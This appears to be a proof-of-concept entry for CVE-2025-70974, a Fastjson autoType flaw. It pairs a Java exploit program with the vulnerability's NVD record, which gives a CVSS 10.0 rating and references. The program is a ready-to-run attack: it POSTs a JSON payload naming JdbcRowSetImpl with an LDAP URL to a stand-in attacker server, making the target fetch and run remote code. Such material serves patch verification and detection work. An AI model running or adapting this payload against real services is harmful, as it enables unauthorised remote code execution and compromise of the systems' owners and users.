CVE-2025-70974

import java.io.BufferedReader; import java.io.InputStreamReader; public class fastjson_rce_poc { public static void main(String[] args) { try { // Target URL for LDAP/RMI server String target = "http://target-server:8080/api"; String jndiUrl = "ldap://attacker-server:1389/Exploit"; // Malicious JSON payload with @type for JNDI injection String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," + "\"dataSourceName\":\"" + jndiUrl + "\"," + "\"autoCommit\":true}"; System.out.println("[*] Sending malicious payload..."); System.out.println("[*] Payload: " + payload); // Send the malicious JSON to the target java.net.HttpURLConnection conn = (java.net.HttpURLConnection) new java.net.URL(target) .openConnection(); conn.setRequestMethod("POST"); conn.setRequestProperty("Content-Type", "application/json"); conn.setDoOutput(true); conn.getOutputStream().write(payload.getBytes()); BufferedReader reader = new BufferedReader( new InputStreamReader(conn.getInputStream())); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } } catch (Exception e) { e.printStackTrace(); } } }

{"cve": {"id": "CVE-2025-70974", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:02.677", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845."}, {"lang": "es", "value": "Fastjson anterior a 1.2.48 maneja incorrectamente autoType porque, cuando una clave @type está en un documento JSON y el valor de esa clave es el nombre de una clase Java, puede haber llamadas a ciertos métodos públicos de esa clase. Dependiendo del comportamiento de esos métodos, puede haber inyección JNDI con una carga útil proporcionada por el atacante ubicada en otra parte de ese documento JSON. Esto fue explotado en la naturaleza entre 2023 y 2025. NOTA: este problema existe debido a una corrección incompleta para CVE-2017-18349. Además, una omisión posterior está cubierta por CVE-2022-25845."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-829"}]}], "references": [{"url": "https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955", "source": "[email protected]"}, {"url": "https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48", "source": "[email protected]"}, {"url": "https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce", "source": "[email protected]"}, {"url": "https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger", "source": "[email protected]"}, {"url": "https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238", "source": "[email protected]"}, {"url": "https://www.freebuf.com/vuls/208339.html", "source": "[email protected]"}, {"url": "https://www.seebug.org/vuldb/ssvid-98020", "source": "[email protected]"}]}}